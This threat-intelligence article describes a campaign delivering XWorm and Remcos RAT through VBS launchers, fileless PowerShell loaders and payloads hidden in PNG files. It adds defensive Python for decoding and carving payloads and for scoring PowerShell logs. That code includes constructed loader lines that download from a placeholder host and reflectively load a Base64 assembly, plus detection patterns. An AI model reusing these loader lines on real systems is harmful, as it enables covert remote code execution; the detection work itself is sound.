Open Directory Malware Campaign Delivers RAT Payloads via VBS and PNG Loaders
Key Takeaways
- A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure.
- The attack chain utilizes obfuscated Visual Basic Script (VBS) files to launch fileless PowerShell loaders, which then retrieve malicious payloads hidden within seemingly benign PNG image files.
- Affected systems can be compromised with XWorm variants and Remcos RAT, along with a User Account Control (UAC) bypass, granting attackers persistent remote access and elevated privileges.
- The campaign leverages an adaptable command-and-control (C2) setup, allowing threat actors to rapidly change or expand their malicious arsenal.
A complex, multi-stage malware operation has emerged, leveraging obfuscated Visual Basic Script (VBS) files, image-based loaders, and remote access trojans (RATs) to infiltrate target systems. Details of this campaign were uncovered by cybersecurity researchers at LevelBlue’s SpiderLabs Cyber Threat Intelligence team.
Initially, an endpoint detection in early 2026 flagged a suspicious VBS file. What appeared to be an isolated incident quickly revealed a more organized threat: a reusable delivery framework capable of distributing diverse malware payloads across multiple attack vectors from a unified infrastructure.
Initial Detection and Unveiling the Campaign
The campaign first came to light with the discovery of a VBS file, named Name_File.vbs, located in the Users\Public\Downloads directory of a compromised endpoint. SentinelOne’s endpoint protection successfully quarantined the file before it could fully execute, but its encoded contents prompted further investigation.
Deobfuscating the VBS script exposed a Base64-encoded PowerShell command containing external network references, indicating an intent to fetch additional malicious components from a remote server. This initial alert provided LevelBlue analysts with a crucial entry point into a much broader cyber operation.
The subsequent investigation by LevelBlue’s SpiderLabs team revealed an attacker-controlled domain hosting numerous obfuscated VBS files. Each file was designed to deliver a different malware payload, including various XWorm variants and Remcos RAT, often disguised as plain text files. The researchers also identified a separate infection chain on the same infrastructure, initiated by a fake PDF file, confirming the campaign’s deliberate multi-vector design. A detailed report on the campaign can be found in the LevelBlue blog.
Attacker Infrastructure: The Open Directory Advantage
The core of the attacker’s infrastructure revolved around openly accessible directories hosted on the domain news4me[.]xyz. Specific subdirectories like /coupon/, /protector/, and /invoice/ each played a distinct role in the attack. These directories were used for staging VBS launchers, hosting obfuscated payload files, and delivering alternative infection vectors.
This “open directory” strategy was a deliberate design choice, providing the attackers with significant operational flexibility. It allowed them to rapidly update, rotate, or expand their hosted payloads without altering the underlying delivery logic. This adaptive system ensures continued operation even if specific components are detected and mitigated.
Inside the Infection Mechanism: VBS to In-Memory RAT Execution
The infection process initiates with a VBS file that functions solely as a launcher, devoid of any active malicious code itself.

This script is heavily obscured using Unicode obfuscation. Removing these layers reveals a Base64-encoded PowerShell command, which serves as the true operational core of the attack.

The decoded PowerShell command acts as a fileless loader. It enforces TLS 1.2 and employs the Net.WebClient class to retrieve a remote file from an Internet Archive URL.

Instead of downloading a standard executable, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image appears innocuous, but it secretly harbors a Base64-encoded .NET assembly, known as PhantomVAI, embedded between custom BaseStart and BaseEnd markers. This assembly is loaded directly into memory via Reflection.Assembly::Load, allowing it to execute entirely in RAM and effectively bypass many file-based security defenses.
Once PhantomVAI is active, it receives two URLs through its VAI method for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a fully functional instance of the Remcos RAT, providing the attacker with persistent remote access. The second URL delivers uac.png, another PNG file containing a User Account Control (UAC) Bypass DLL, embedded in the same format, designed to silently escalate privileges on the compromised system. This combination of payloads grants the attackers comprehensive control while leaving minimal traditional file artifacts.
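The chain just described, as an added analyst-side example that is not part of the article or of LevelBlue's tooling: it decodes a `-EncodedCommand` argument from a constructed VBS launcher line (real samples carry Unicode obfuscation on top of this, which is not reproduced here), then carves whatever sits between `BaseStart` and `BaseEnd` in a PNG and checks the result for a PE header, which is what a .NET assembly would present. The VBS line, the PNG, the `example.invalid` URL, the stand-in assembly bytes and the placement of the markers after the IEND chunk are all constructed assumptions; only the marker names and the image file name come from the page.

```python
from __future__ import annotations

import base64
import re
import struct
import zlib

# Matches the Base64 argument of powershell -e / -ec / -enc / -EncodedCommand.
ENC_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str | None:
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text; decode it or return None."""
    m = ENC_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def carve_marked_payload(blob: bytes, start: bytes = b"BaseStart", end: bytes = b"BaseEnd") -> bytes | None:
    """Return the Base64-decoded bytes found between two marker strings anywhere in a file, or None."""
    i = blob.find(start)
    if i < 0:
        return None
    j = blob.find(end, i + len(start))
    if j < 0:
        return None
    b64 = re.sub(rb"\s+", b"", blob[i + len(start):j])  # tolerate line-wrapped Base64
    try:
        return base64.b64decode(b64, validate=True)
    except ValueError:
        return None


def is_pe(data: bytes) -> bool:
    """Cheap PE check: 'MZ' at offset 0 and 'PE\\0\\0' at the e_lfanew offset (0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(vbs_line: str, png_bytes: bytes) -> dict:
    """Pull the loader script out of the launcher and the hidden payload out of the image."""
    ps = decode_encoded_command(vbs_line) or ""
    payload = carve_marked_payload(png_bytes)
    return {
        "powershell": ps,
        "urls": URL_RE.findall(ps),
        "payload_len": len(payload) if payload else 0,
        "payload_is_pe": bool(payload) and is_pe(payload),
    }


# ---- constructed test material (not real samples) ---------------------------------
def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF)


def build_sample_png(payload: bytes) -> bytes:
    """A valid 1x1 PNG with the Base64 payload wrapped in markers after IEND.
    Where the real image kept its markers is not stated on the page; appending is an assumption."""
    ihdr = _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = _png_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
    png = b"\x89PNG\r\n\x1a\n" + ihdr + idat + _png_chunk(b"IEND", b"")
    return png + b"BaseStart" + base64.b64encode(payload) + b"BaseEnd"


# Stand-in for a .NET assembly: just enough header for is_pe() to accept it (84 bytes).
FAKE_ASSEMBLY = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16

# A loader in the shape the article describes; example.invalid stands in for the archive URL.
SAMPLE_PS = ("[Net.ServicePointManager]::SecurityProtocol='Tls12';"
             "$c=New-Object Net.WebClient;"
             "$d=$c.DownloadString('https://example.invalid/MSI_PRO_with_b64.png')")
SAMPLE_VBS_LINE = ('CreateObject("WScript.Shell").Run "powershell -nop -w hidden -enc '
                   + base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode() + '", 0')

if __name__ == "__main__":
    print(triage(SAMPLE_VBS_LINE, build_sample_png(FAKE_ASSEMBLY)))
```

Because the carver searches raw bytes rather than parsing chunks, it finds the markers whether they were placed in a tEXt chunk, inside image data or after IEND; the PE check is what separates a real carved assembly from a false hit on the marker strings.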
What You Should Do
- Restrict Script Execution: Implement policies to restrict the execution of .vbs and .bat files from user-writable directories, such as Users\Public.
- Enforce PowerShell Policies: Apply constrained PowerShell policies and enable Script Block Logging so that loaders that run entirely in memory still leave a record that can be used to detect fileless attacks.
- Network Filtering: Block WebDAV-based connections and consider filtering traffic to and from .xyz top-level domains to disrupt communication with known attacker infrastructure.
- Advanced Endpoint Protection: Ensure your endpoint detection and response (EDR) solutions are configured to monitor for suspicious in-memory activity and fileless execution techniques, not just file-based threats.
- Threat Intelligence Integration: Integrate external threat intelligence feeds to stay updated on new attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).
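For the logging recommendation above, an added example (not from the article or from LevelBlue) of what a detection over PowerShell Script Block Logging text (Event ID 4104) can key on, using the loader traits the article lists: TLS 1.2 pinning, a Net.WebClient download, a .png fetched over HTTP, the BaseStart/BaseEnd markers, FromBase64String and Reflection.Assembly::Load. The log records are constructed (record 2 is a stand-in in the shape the article describes, not the campaign's script, and example.invalid replaces the real URL); the indicator weights and the alert threshold are assumptions to tune against your own baseline.

```python
from __future__ import annotations

import re

# Indicator name -> (pattern, weight). Weights are an assumption; tune against your baseline.
INDICATORS = {
    "tls_pin": (re.compile(r"SecurityProtocol\s*=\s*\S*Tls12", re.I), 1),
    "webclient": (re.compile(r"Net\.WebClient|DownloadString|DownloadData", re.I), 1),
    "b64_decode": (re.compile(r"FromBase64String", re.I), 1),
    "image_fetch": (re.compile(r"https?://\S+?\.png", re.I), 2),
    "marker_carve": (re.compile(r"BaseStart|BaseEnd", re.I), 3),
    "reflect_load": (re.compile(r"Reflection\.Assembly\]?::Load\b", re.I), 3),
}
ALERT_THRESHOLD = 5  # one strong trait plus a supporting one, or several weak ones together


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one script block's text."""
    hits = [name for name, (rx, _weight) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[h][1] for h in hits), hits


def triage_events(events: list[dict]) -> list[dict]:
    """Keep only 4104 records whose ScriptBlockText scores at or above the threshold."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:  # only script block records carry the full text
            continue
        score, hits = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= ALERT_THRESHOLD:
            alerts.append({"RecordId": ev.get("RecordId"), "score": score, "hits": hits})
    return alerts


# Constructed records mimicking the fields of Microsoft-Windows-PowerShell/Operational events.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem 'C:\\Users\\Public\\Downloads' | Where-Object Length -gt 1MB"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": (
         "[Net.ServicePointManager]::SecurityProtocol='Tls12';"
         "$w=New-Object Net.WebClient;"
         "$s=$w.DownloadString('https://example.invalid/MSI_PRO_with_b64.png');"
         "$i=$s.IndexOf('BaseStart')+9;$j=$s.IndexOf('BaseEnd');"
         "[Reflection.Assembly]::Load([Convert]::FromBase64String($s.Substring($i,$j-$i)))")},
    {"RecordId": 3, "EventID": 4103,
     "ScriptBlockText": "Invoke-WebRequest https://example.invalid/logo.png -OutFile logo.png"},
]

if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(alert)
```

Record 3 shows why the score is weighted rather than a plain keyword match: a legitimate download of a .png is a weak signal on its own and never reaches the threshold, while the marker strings and the reflective load are strong enough that either one plus any supporting trait raises an alert.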
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.